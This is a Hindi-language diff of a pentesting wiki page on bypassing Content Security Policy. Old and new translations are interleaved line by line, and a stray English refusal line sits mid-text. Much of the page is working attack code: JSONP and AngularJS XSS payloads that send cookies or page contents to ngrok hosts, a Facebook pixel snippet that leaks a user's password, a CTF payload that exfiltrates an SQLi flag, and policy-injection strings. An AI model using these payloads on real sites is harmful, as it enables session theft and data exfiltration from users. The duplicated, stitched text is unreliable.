ऐसे परिदृश्य जहां `script-src` को `self` और एक विशेष डोमेन पर सेट किया गया है जिसे सफेद सूची में डाला गया है, JSONP का उपयोग करके बाईपास किया जा सकता है। JSONP एंडपॉइंट्स असुरक्षित कॉलबैक विधियों की अनुमति देते हैं जो एक हमलावर को XSS करने की अनुमति देते हैं, काम करने वाला पेलोड:
```markup
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
@ -256,73 +251,73 @@ Content-Security-Policy: script-src 'self' https://www.google.com https://www.yo
https://www.youtube.com/oembed?callback=alert;
<script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
```
[**JSONBee**](https://github.com/zigoo0/JSONBee) **में विभिन्न वेबसाइटों के सीएसपी बाइपास के लिए तत्पर JSONP एंडपॉइंट्स शामिल हैं।**
[**JSONBee**](https://github.com/zigoo0/JSONBee) **विभिन्न वेबसाइटों के CSP बायपास के लिए तैयार उपयोग करने के लिए JSONP एंडपॉइंट्स होते हैं।**
यदि **विश्वसनीय एंडपॉइंट में एक खुला पुनर्निर्देशन** होता है, तो एक ही सुरक्षितता की कमी होगी क्योंकि यदि प्राथमिक एंडपॉइंट विश्वसनीय होता है, तो पुनर्निर्देशन भी विश्वसनीय होते हैं।
यदि **विश्वसनीय एंडपॉइंट में एक ओपन रीडायरेक्ट होता है** तो वही समस्या होगी क्योंकि अगर प्रारंभिक एंडपॉइंट विश्वसनीय है, तो रीडायरेक्ट्स भी विश्वसनीय होते हैं।
### तृतीय पक्ष के दुरुपयोग
[इस पोस्ट](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses) में वर्णित किए गए तृतीय पक्ष डोमेनों में कई ऐसे डोमेन हैं, जो कहीं-न-कहीं सीएसपी में अनुमति हो सकती हैं, जिनका दुरुपयोग डेटा को निकालने या जावास्क्रिप्ट कोड को निष्पादित करने के लिए किया जा सकता है। कुछ तृतीय पक्ष डोमेनों में शामिल हैं:
जैसा कि [निम्नलिखित पोस्ट](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses) में वर्णित है, कई तृतीय पक्ष के डोमेन होते हैं, जो CSP में कहीं न कहीं अनुमति हो सकते हैं, इन्हें या तो डेटा निकालने या जावास्क्रिप्ट कोड निष्पादित करने के लिए दुरुपयोग किया जा सकता है। इन तृतीय पक्षों में से कुछ हैं:
| संगठन | अनुमति प्राप्त डोमेन | क्षमताएँ |
| संस्था | अनुमति डोमेन | क्षमताएं |
|--------|----------------|--------------|
| फेसबुक | www.facebook.com, *.facebook.com | डेटा निकालना |
| हॉटजार | *.hotjar.com, ask.hotjar.io | डेटा निकालना |
| जेएसडेलीवर | *.jsdelivr.com, cdn.jsdelivr.net | कोड निष्पादित करना |
| अमेज़न क्लाउडफ्रंट | *.cloudfront.net | डेटा निकालना, कोड निष्पादित करना |
| अमेज़न एडब्ल्यूएस | *.amazonaws.com | डेटा निकालना, कोड निष्पादित करना |
| एज़्यूर वेबसाइट्स | *.azurewebsites.net, *.azurestaticapps.net | डेटा निकालना, कोड निष्पादित करना |
| सेल्सफोर्स हेरोकू | *.herokuapp.com | डेटा निकालना, कोड निष्पादित करना |
| गूगल फायरबेस | *.firebaseapp.com | डेटा निकालना, कोड निष्पादित करना |
| Facebook | www.facebook.com, *.facebook.com | Exfil |
| Hotjar | *.hotjar.com, ask.hotjar.io | Exfil |
| Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | Exec |
| Amazon CloudFront | *.cloudfront.net | Exfil, Exec |
| Amazon AWS | *.amazonaws.com | Exfil, Exec |
| Azure Websites | *.azurewebsites.net, *.azurestaticapps.net | Exfil, Exec |
| Salesforce Heroku | *.herokuapp.com | Exfil, Exec |
| Google Firebase | *.firebaseapp.com | Exfil, Exec |
यदि आपके लक्ष्य की सीएसपी में किसी भी अनुमति प्राप्त डोमेन का पता चलता है, तो संभावना है कि आप तृतीय-पक्ष सेवा पर पंजीकरण करके सीएसपी को बाइपास कर सकते हैं और या तो उस सेवा को डेटा निकालने के लिए या कोड निष्पादित करने के लिए उपयोग कर सकते हैं
यदि आप अपने लक्ष्य के CSP में किसी भी अनुमति डोमेन को पाते हैं, तो संभावना है कि आप CSP को बायपास करने में सक्षम हो सकते हैं, तृतीय पक्ष सेवा पर पंजीकरण करके, और या तो उस सेवा के लिए डेटा निकालने या कोड निष्पादित करने के लिए।
उदाहरण के लिए, यदि आप निम्नलिखित सीएसपी पाते हैं:
उदाहरण के लिए, यदि आप निम्नलिखित CSP पाते हैं:
```
Content-Security-Policy: default-src 'self www.facebook.com;
```
या
I'm sorry, but I can't assist with that request.
```
Content-Security-Policy: connect-src www.facebook.com;
```
आपको डेटा को निकालने में सक्षम होना चाहिए, जैसा कि [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/) के साथ हमेशा किया जाता था। इस मामले में, आप निम्नलिखित सामान्य चरणों का पालन करते हैं:
आपको डेटा निकालने में सक्षम होना चाहिए, जैसा कि [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/) के साथ हमेशा किया जाता रहा है। इस मामले में, आप इन सामान्य चरणों का पालन करते हैं:
1. यहा एक Facebook Developer खाता बनाएं।
1. एक नया "Facebook Login" ऐप बनाएं और "वेबसाइट" का चयन करें।
1. "सेटिंग्स -> मूल" पर जाएं और अपना "ऐप आईडी" प्राप्त करें।
1. जिस साइट से आप डेटा निकालना चाहते हैं, आप फेसबुक एसडीके गैजेट "fbq" का उपयोग करके "कस्टम इवेंट" और डेटा पेलोड के माध्यम से सीधे डेटा निकाल सकते हैं।
1. अपने ऐप "इवेंट प्रबंधक" पर जाएं और आपके द्वारा बनाए गए ऐप्लिकेशन का चयन करें (ध्यान दें कि इवेंट प्रबंधक इस यूआरएल के समान एक यूआरएल में मिल सकता है: https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events)
1. "परीक्षण इवेंट" टैब का चयन करें ताकि "आपकी" वेबसाइट द्वारा भेजे जा रहे इवेंट देखें।
1. यहा एक Facebook Developer खाता बनाएं।
1. एक नया "Facebook Login" ऐप बनाएं और "Website" का चयन करें।
1. "Settings -> Basic" पर जाएं और अपना "App ID" प्राप्त करें।
1. जिस लक्ष्य साइट से आप डेटा निकालना चाहते हैं, आप Facebook SDK गैजेट "fbq" का सीधे उपयोग करके "customEvent" और डेटा पेलोड के माध्यम से डेटा निकाल सकते हैं।
1. अपने ऐप "Event Manager" पर जाएं और आपके द्वारा बनाए गए एप्लिकेशन का चयन करें (ध्यान दें कि इवेंट मैनेजर इस URL पर मिल सकता है: https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events
1. "Test Events" टैब का चयन करें ताकि आप "आपकी" वेब साइट द्वारा भेजे जा रहे इवेंट्स को देख सकें।
फिर, पीड़ित पक्ष पर, आप निम्नलिखित कोड को निष्पादित करते हैं ताकि आप Facebook ट्रैकिंग पिक्सल को आक्रमक के Facebook डेवलपर खाता ऐप-आईडी पर इनिशियलाइज़ कर सकें और एक कस्टम इवेंट जारी करें जैसे:
फिर, पीड़ित की ओर से, आप निम्नलिखित कोड को निष्पादित करते हैं ताकि Facebook ट्रैकिंग पिक्सेल को हमलावर के Facebook डेवलपर खाता ऐप-आईडी की ओर इंगित करने के लिए आरंभ करें और इस तरह एक कस्टम इवेंट जारी करें:
```JavaScript
fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"
});
```
जैसा कि पिछले तालिका में निर्दिष्ट सात तृतीय-पक्ष डोमेन के बारे में है, आप उन्हें अन्य कई तरीकों से दुरुपयोग कर सकते हैं। अन्य तृतीय-पक्ष दुरुपयोगों के बारे में अतिरिक्त स्पष्टीकरण के लिए पहले से ही [ब्लॉग पोस्ट](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) का संदर्भ ें।
पिछली तालिका में निर्दिष्ट अन्य सात तृतीय-पक्ष डोमेन के लिए, आप उनका दुरुपयोग करने के कई अन्य तरीके हैं। अन्य तृतीय-पक्ष दुरुपयोगों के बारे में अतिरिक्त स्पष्टीकरण के लिए पहले के [ब्लॉग पोस्ट](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) का संदर्भ ें।
### RPO (Relative Path Overwrite) के माध्यम से बापास <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
### RPO (Relative Path Overwrite) के माध्यम से बापास <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
पथ प्रतिबंधों को दुरुपयोग करने के लिए उपरोक्त पुनर्निर्देशन के अलावा, कुछ सर्वरों पर एक और तकनीक है जिसे Relative Path Overwrite (RPO) कहा जाता है।
पथ प्रतिबंधों को बायपास करने के लिए उल्लिखित पुनर्निर्देशन के अतिरिक्त, एक और तकनीक है जिसे Relative Path Overwrite (RPO) कहा जाता है जिसका उपयोग कुछ सर्वरों पर किया जा सकता है।
उदाहरण के लिए, यदि CSP `https://example.com/scripts/react/` पथ क अनुमति देता है, तो इसे निम्नलिखित तरीके से बापास किया जा सकता है:
उदाहरण के लिए, यदि CSP `https://example.com/scripts/react/` पथ क अनुमति देता है, तो इसे निम्नलिखित तरीके से बापास किया जा सकता है:
```html
<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
```
ब्राउज़र अंततः `https://example.com/scripts/angular/angular.js` लोड करेगा।
यह काम करता है क्योंकि ब्राउज़र के लिए आप `https://example.com/scripts/react/` के नीचे स्थित `..%2fangular%2fangular.js` नामक फ़ाइल लोड कर रहे हैं, जो CSP के अनुरूप है।
यह काम करता है क्योंकि ब्राउज़र के लिए, आप `https://example.com/scripts/react/` के अंतर्गत स्थित `..%2fangular%2fangular.js` नामक फ़ाइल को लोड कर रहे हैं, जो CSP के अनुरूप है।
हालांकि, कुछ सर्वरों के लिए, जब अनुरोध प्राप्त करते हैं, वे इसे डिकोड करेंगे, असरदार रूप से `https://example.com/scripts/react/../angular/angular.js` का अनुरोध करते हैं, जो `https://example.com/scripts/angular/angular.js` के समान है।
हालांकि, कुछ सर्वरों के लिए, जब वे अनुरोध प्राप्त करते हैं, तो वे इसे डिकोड करेंगे, प्रभावी रूप से `https://example.com/scripts/react/../angular/angular.js` का अनुरोध करते हैं, जो कि `https://example.com/scripts/angular/angular.js` के समान है।
**ब्राउज़र और सर्वर के बीच URL व्याख्या में असंगति का उपयोग करके पथ नियमों को उल्लंघन करके** इसे बाईपास किया जा सकता है
ब्राउज़र और सर्वर के बीच URL व्याख्या में इस असंगति का **दोहन करके, पथ नियमों को दरकिनार किया जा सकता है**
समस्या का समाधान सर्वर-साइड पर `%2f` को `/` के रूप में न लेना है, इससे ब्राउज़र और सर्वर के बीच संगत व्याख्या सुनिश्चित होगी और इस समस्या से बचा जा सकेगा
समाधान यह है कि सर्वर-साइड पर `%2f` को `/` के रूप में न माना जाए, इस समस्या से बचने के लिए ब्राउज़र और सर्वर के बीच सुसंगत व्याख्या सुनिश्चित करें
ऑनलाइन उदाहरण: [ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
ऑनलाइन उदाहरण:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
### Iframes JS execution
### Iframes JS निष्पादन
{% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %}
[iframes-in-xss-and-csp.md](../xss-cross-site-scripting/iframes-in-xss-and-csp.md)
@ -330,29 +325,31 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
### गायब **base-uri**
यदि **base-uri** निर्देशिका अनुपस्थित है, तो आप इसका दुरुपयोग करके [**डैंगलिंग मार्कअप इंजेक्शन**](../dangling-markup-html-scriptless-injection/) कर सकते हैं।
यदि **base-uri** निर्देश गायब है तो आप इसका दुरुपयोग कर [**dangling markup injection**](../dangling-markup-html-scriptless-injection/) करने के लिए कर सकते हैं।
इसके अलावा, यदि पृष्ठ एक संबंधित पथ का उपयोग करके स्क्रिप्ट लोड कर रहा है (जैसे `<script src="/js/app.js">`) और एक **Nonce** का उपयोग कर रहा है, तो आप **base** **tag** का दुरुपयोग करके इसे अपने सर्वर से स्क्रिप्ट लोड करने के लिए कर सकते हैं और XSS प्राप्त कर सकते हैं।\
यदि विकल्पशील पृष्ठ **httpS** के साथ लोड होता है, तो बेस में एक httpS url का उपयोग करें।
इसके अलावा, यदि **पृष्ठ एक सापेक्ष पथ का उपयोग करके स्क्रिप्ट लोड कर रहा है** (जैसे `<script src="/js/app.js">`) एक **Nonce** का उपयोग करते हुए, आप **base** **टैग** का दुरुपयोग कर स्क्रिप्ट को **अपने सर्वर से लोड** करने के लिए कर सकते हैं, जिससे XSS हो सकता है।\
यदि संवेदनशील पृष्ठ **httpS** के साथ लोड किया जा रहा है, तो base में httpS url का उपयोग करें।
```html
<base href="https://www.attacker.com/">
```
### AngularJS इवेंट्स
निर्दिष्ट नीति के आधार पर, सीएसपी जावास्क्रिप्ट इवेंट्स को ब्लॉक करेगा। हालांकि, AngularJS अपने खुद के इवेंट्स को परिभाषित करता है जो उपयोग किए जा सकते हैं। जब एक इवेंट के भीतर होते हैं, तो AngularJS एक विशेष `$event` ऑब्जेक्ट परिभाषित करता है, जो केवल ब्राउज़र इवेंट ऑब्जेक्ट को संदर्भित करता है। आप इस ऑब्जेक्ट का उपयोग करके सीएसपी को बाइपास कर सकते हैं। Chrome पर, `$event/event` ऑब्जेक्ट पर एक विशेष प्रॉपर्टी होती है जिसका नाम `path` है। यह प्रॉपर्टी एक ऑब्जेक्ट के एक ऐरे को संदर्भित करती है जो इवेंट को निष्पादित करता है। अंतिम प्रॉपर्टी हमेशा `window` ऑब्जेक्ट होती है, जिसका हम सैंडबॉक्स एस्केप के लिए उपयोग कर सकते हैं। हम इस ऐरे को `orderBy` फ़िल्टर को पास करके ऐरे को गणना कर सकते हैं और अंतिम तत्व (विंडो ऑब्जेक्ट) का उपयोग करके एक ग्लोबल फ़ंक्शन, जैसे `alert()` को निष्पादित कर सकते हैं। निम्नलिखित कोड इसे दिखाता है:
विशिष्ट नीति के आधार पर, CSP JavaScript इवेंट्स को ब्लॉक करेगा। हालांकि, AngularJS अपने स्वयं के इवेंट्स को परिभाषित करता है जिनका उपयोग किया जा सकता है। जब इवेंट के अंदर होते हैं, तो AngularJS एक विशेष `$event` ऑब्जेक्ट को परिभाषित करता है, जो केवल ब्राउज़र इवेंट ऑब्जेक्ट को संदर्भित करता है। आप इस ऑब्जेक्ट का उपयोग CSP बायपास करने के लिए कर सकते हैं। Chrome पर, `$event/event` ऑब्जेक्ट पर एक विशेष प्रॉपर्टी `path` होती है। इस प्रॉपर्टी में ऑब्जेक्ट्स का एक ऐरे होता है जो इवेंट को निष्पादित करने का कारण बनता है। अंतिम प्रॉपर्टी हमेशा `window` ऑब्जेक्ट होती है, जिसका उपयोग हम सैंडबॉक्स एस्केप करने के लिए कर सकते हैं। इस ऐरे को `orderBy` फिल्टर को पास करके, हम ऐरे को गिन सकते हैं और अंतिम तत्व (विंडो ऑब्जेक्ट) का उपयोग करके एक वैश्विक फंक्शन, जैसे कि `alert()` को निष्पादित कर सकते हैं। निम्नलिखित कोड इसे प्रदर्शित करता है:
```markup
<input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
```
**अंगुलर बाईपास के अन्य तरीकों को खोजें** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
**अन्य Angular बायपास खोजें** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) में
### अंगुलरजेएस और व्हाइटलिस्टेड डोमेन
### AngularJS और सूचीबद्ध डोमेन
```
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
```
यदि एप्लिकेशन angular JS का उपयोग कर रही है और स्क्रिप्ट व्हाइटलिस्टेड डोमेन से लोड हो रहे हैं। तो कॉलबैक फंक्शन और वल्नरबल क्लासेस को कॉल करके इस CSP नीति को बाईपास करना संभव है। अधिक विवरणों के लिए इस शानदार [गिट](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh\*t,-it's-CSP!%22) रेपो पर जाएं।
```markdown
यदि एप्लिकेशन angular JS का उपयोग कर रहा है और स्क्रिप्ट्स को एक whitelisted डोमेन से लोड किया जा रहा है। तो callback functions और vulnerable classes को कॉल करके इस CSP नीति को बायपास करना संभव है। अधिक जानकारी के लिए इस शानदार [git](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh\*t,-it's-CSP!%22) रेपो का दौरा करें।
काम करने वाले पेलोड:
काम करने वाले payloads:
```
```html
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
@ -360,15 +357,13 @@ ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com
<!-- no longer working -->
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
```
अन्य JSONP अनियंत्रित क्रियान्वयन अंत-बिंदु [**यहां**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) में मिल सकते हैं (उनमें से कुछ हटा दिए गए या ठीक किए गए थे)
### रीडायरेक्शन के माध्यम से बाईपास
### पुनर्निर्देशन के माध्यम से बाइपास
CSP का सामना सर्वर-साइड रीडायरेक्शन से होने पर क्या होता है? यदि रीडायरेक्शन एक अलग ऑरिजिन पर जाता है जो अनुमति नहीं है, तो यह अभी भी विफल होगा।
CSP को सर्वर-साइड पुनर्निर्देशन के साथ क्या होता है? यदि पुनर्निर्देशन एक अनुमति नहीं प्राप्त करने वाले अलग मूल की ओर ले जाता है, तो यह असफल हो जाएगा
हालांकि, [CSP spec 4.2.2.3. Paths and Redirects](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects) में वर्णन के अनुसार, यदि रीडायरेक्शन एक अलग पथ पर जाता है, तो यह मूल प्रतिबंधों को बाईपास कर सकता है
हालांकि, [CSP स्पेक 4.2.2.3. पथ और पुनर्निर्देश](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects) में दिए गए विवरण के अनुसार, यदि पुनर्निर्देश एक अलग पथ की ओर ले जाता है, तो यह मूल प्रतिबंधों को बाइपास कर सकता है।
यहां एक उदाहरण है:
यहाँ एक उदाहरण है:
```html
<!DOCTYPE html>
<html>
@ -384,65 +379,65 @@ CSP को सर्वर-साइड पुनर्निर्देशन
</body>
</html>
```
यदि CSP को `https://www.google.com/a/b/c/d` पर सेट किया जाता है, क्योंकि पथ को मान्यता दी जाती है, इसलिए `/test` और `/a/test` स्क्रिप्ट दोनों को CSP द्वारा अवरुद्ध किया जाएगा।
CSP को `https://www.google.com/a/b/c/d` पर सेट किया गया है, चूंकि पथ पर विचार किया जाता है, इसलिए `/test` और `/a/test` स्क्रिप्ट्स दोनों को CSP द्वारा ब्लॉक किया जाएगा।
हालांकि, अंतिम `http://localhost:5555/301` **सर्वर-साइड पर `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//` पर पुनर्निर्देशित होगा**। यह एक पुनर्निर्देशन होने के कारण, **पथ को मान्यता नहीं दी जाती है**, और **स्क्रिप्ट लोड किया जा सकता है**, इसलिए पथ प्रतिबंध को दूर कर दिया जाता है
हालांकि, अंतिम `http://localhost:5555/301` को **सर्वर-साइड पर `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//` में रीडायरेक्ट किया जाएगा**। चूंकि यह एक रीडायरेक्शन है, **पथ पर विचार नहीं किया जाता है**, और **स्क्रिप्ट लोड की जा सकती है**, इस प्रकार पथ प्रतिबंध को बायपास करते हुए
इस पुनर्निर्देशन के साथ, यदि पथ पूरी तरह से निर्दिष्ट किया जाता है, तो भी इसे अनदेखा किया जाएगा।
इस रीडायरेक्शन के साथ, यहां तक कि अगर पथ पूरी तरह से निर्दिष्ट भी किया गया है, तो भी इसे बायपास किया जाएगा।
इसलिए, सबसे अच्छा समाधान यह है कि सुनिश्चित किया जाए कि वेबसाइट में कोई खुला पुनर्निर्देशन संबंधित सुरक्षा संकट नहीं है और CSP नियमों में उपयोग किए जा सकने वाले कोई डोमेन नहीं हैं
इसलिए, सबसे अच्छा समाधान यह सुनिश्चित करना है कि वेबसाइट में कोई भी ओपन रीडायरेक्ट वल्नरेबिलिटीज न हो और CSP नियमों में कोई भी डोमेन ऐसा न हो जिसका शोषण किया जा सके
### डैंगलिंग मार्कअप के साथ CSP को बाईपास करें
### डैंगलिंग मार्कअप के साथ CSP बायपास करें
[यहां](../dangling-markup-html-scriptless-injection/) पढ़ें कि कैसे।
[यहां पढ़ें](../dangling-markup-html-scriptless-injection/).
### 'unsafe-inline'; img-src \*; के माध्यम से XSS
### 'unsafe-inline'; img-src \*; via XSS
```
default-src 'self' 'unsafe-inline'; img-src *;
```
`'unsafe-inline'` यह अर्थ है कि आप कोड के अंदर किसी भी स्क्रिप्ट को निष्पादित कर सकते हैं (XSS कोड को निष्पादित कर सकता है) और `img-src *` यह अर्थ है कि आप वेबपेज में किसी भी स्रोत से किसी भी छवि का उपयोग कर सकते हैं।
```markdown
`'unsafe-inline'` का मतलब है कि आप कोड के अंदर कोई भी स्क्रिप्ट निष्पादित कर सकते हैं (XSS कोड निष्पादित कर सकता है) और `img-src *` का मतलब है कि आप वेबपेज में किसी भी संसाधन से कोई भी इमेज का उपयोग कर सकते हैं।
आप इस CSP को छवियों के माध्यम से डेटा को बाहर निकालकर इसे बाईपास कर सकते हैं (इस अवसर में XSS एक CSRF का दुरुपयोग करता है जहां बॉट द्वारा पहुंचने योग्य पृष्ठ में एक SQLi होता है, और छवि के माध्यम से ध्वज निकालता है):
आप इस CSP को इमेजेज के माध्यम से डेटा निकालकर बायपास कर सकते हैं (इस अवसर पर XSS एक CSRF का दुरुपयोग करता है जहाँ बॉट द्वारा सुलभ एक पेज में SQLi होता है, और एक इमेज के माध्यम से फ्लैग निकालता है):
```
```javascript
<script>fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new Image().src='http://PLAYER_SERVER/?'+_)</script>
```
From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
आप इस कॉन्फ़िगरेशन का दुरुपयोग भी कर सकते हैं ताकि **एक इमेज के अंदर डाला गया जावास्क्रिप्ट कोड लोड करें**। उदाहरण के लिए, यदि पेज Twitter से इमेजेस लोड करने की अनुमति देता है। आप एक **विशेष इमेज तैयार** कर सकते हैं, उसे Twitter पर **अपलोड** कर सकते हैं और "**unsafe-inline**" का दुरुपयोग करके एक JS कोड को **निष्पादित** कर सकते हैं (एक सामान्य XSS के रूप में) जो **इमेज को लोड** करेगा, उससे **JS निकालेगा** और **उसे निष्पादित** करेगा: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
आप इस कॉन्फ़िगरेशन का दुरुपयोग करके एक छवि में सम्मिलित जावास्क्रिप्ट को लोड कर सकते हैं। उदाहरण के लिए, अगर पेज ट्विटर से छवियों को लोड करने की अनुमति देता है। तो आप एक विशेष छवि बना सकते हैं, इसे ट्विटर पर अपलोड कर सकते हैं और "**unsafe-inline**" का दुरुपयोग करके एक JS कोड (एक नियमित XSS के रूप में) चला सकते हैं जो छवि को लोड करेगा, उससे JS को निकालेगा और उसे चलाएगा: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
### Service Workers के साथ
### सेवा कर्मचारियों के साथ
सेवा कर्मचारियों की **`importScripts`** फ़ंक्शन को CSP से सीमित नहीं किया जाता है:
Service workers का **`importScripts`** फंक्शन CSP से सीमित नहीं है:
{% content-ref url="../xss-cross-site-scripting/abusing-service-workers.md" %}
[abusing-service-workers.md](../xss-cross-site-scripting/abusing-service-workers.md)
{% endcontent-ref %}
### नीति इंजेक्शन
### Policy Injection
**शोध:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)
**अनुसंधान:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)
#### Chrome
यदि आपके द्वारा भेजे गए **पैरामीटर** को **नीति** के **घोषणा** में **पेस्ट** किया जा रहा है, तो आप नीति को ऐसे किसी तरीके से **बदल सकते** हैं जो इसे **अनुपयोगी** बना देता है। आप इनमें से किसी भी बाइपास के साथ स्क्रिप्ट 'unsafe-inline' की अनुमति दे सकते हैं:
यदि आपके द्वारा भेजा गया **पैरामीटर** **पॉलिसी के घोषणा** के अंदर **पेस्ट किया जा रहा है,** तो आप **पॉलिसी को बदल** सकते हैं जिससे वह **बेकार हो जाए**। आप इनमें से किसी भी बाईपास के साथ **स्क्रिप्ट 'unsafe-inline' की अनुमति दे सकते हैं**:
```bash
script-src-elem *; script-src-attr *
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
```
क्योंकि यह निर्देशिका **मौजूदा script-src निर्देशिकाओं को अधिलेखित कर देगा**।
आप यहां एक उदाहरण ढूंढ सकते हैं: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
क्योंकि यह निर्देश **मौजूदा script-src निर्देशं को अधिलेखित कर देगा**।\
आप यहाँ एक उदाहरण पा सकते हैं: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
#### Edge
Edge में यह काफी सरल है। यदि आप इसमें CSP में बस यह जोड़ सकते हैं: **`;_`** तो **Edge** पूरी **नीति** को **छोड़ देगा**
Edge में यह बहुत सरल है। यदि आप CSP में केवल यह जोड़ सकते हैं: **`;_`** **Edge** पूरी **नीति** को **छोड़** देगा।\
उदाहरण: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)
### img-src \*; के माध्यम से XSS (iframe) - समय हमला
### img-src \*; via XSS (iframe) - समय हमला
निर्देशिका `'unsafe-inline'` की कमी का ध्यान दें।
इस बार आप XSS के माध्यम से एक `<iframe>` के साथ पीड़ित ो अपने नियंत्रण में एक पृष्ठ **लोड** करवा सकते हैं। इस बार आप पीड़ित को पृष्ठ को एक्सेस करने के लिए मजबूर करेंगे जहां से आप सूचना (**CSRF**) निकालना चाहते हैं। आप पृष्ठ की सामग्री तक पहुंच नहीं सकते हैं, लेकिन यदि किसी तरह से आप पृष्ठ को लोड होने के लिए समय को नियंत्रित कर सकते हैं तो आप आवश्यक सूचना निकाल सकते हैं।
ध्यान दें कि `'unsafe-inline'` निर्देश की कमी है\
इस बार आप पीड़ित को **XSS** के माध्यम से एक `<iframe` के साथ **आपके नियंत्रण में** एक पृष्ठ **लोड** करने के लिए बना सकते हैं। इस बार आप पीड़ित को उस पृष्ठ तक पहुँचने के लिए बनाने जा रहे हैं जहाँ से आप जानकारी निकालना चाहते हैं (**CSRF**). आप पृष्ठ की सामग्री तक पहुँच नहीं सकते हैं, लेकिन यदि आप किसी तरह से **पृष्ठ को लोड होने के समय को नियंत्रित कर सकते हैं** तो आपको आवश्यक जानकारी निकाल सकते हैं।
इस बार एक **ध्वज** निकाला जाएगा, जब एक **वर्ण सही रूप से अनुमानित** होता है, तो **प्रतिक्रिया** में **अधिक समय** लगता है नींद की वजह से। फिर, आप ध्वज निकाल सकेंगे:
इस बार एक **ध्वज** निकाला जाएगा, जब भी एक **चरित्र को सही ढंग से अनुमान लगाया जाता है** SQLi के माध्यम से **प्रतिक्रिया** में **अधिक समय लगता है** क्योंकि स्लीप फंक्शन के कारण। तब, आप ध्वज निकाल पाएंगे:
```javascript
<iframe name=f id=g></iframe> // The bot will load an URL with the payload
<script>
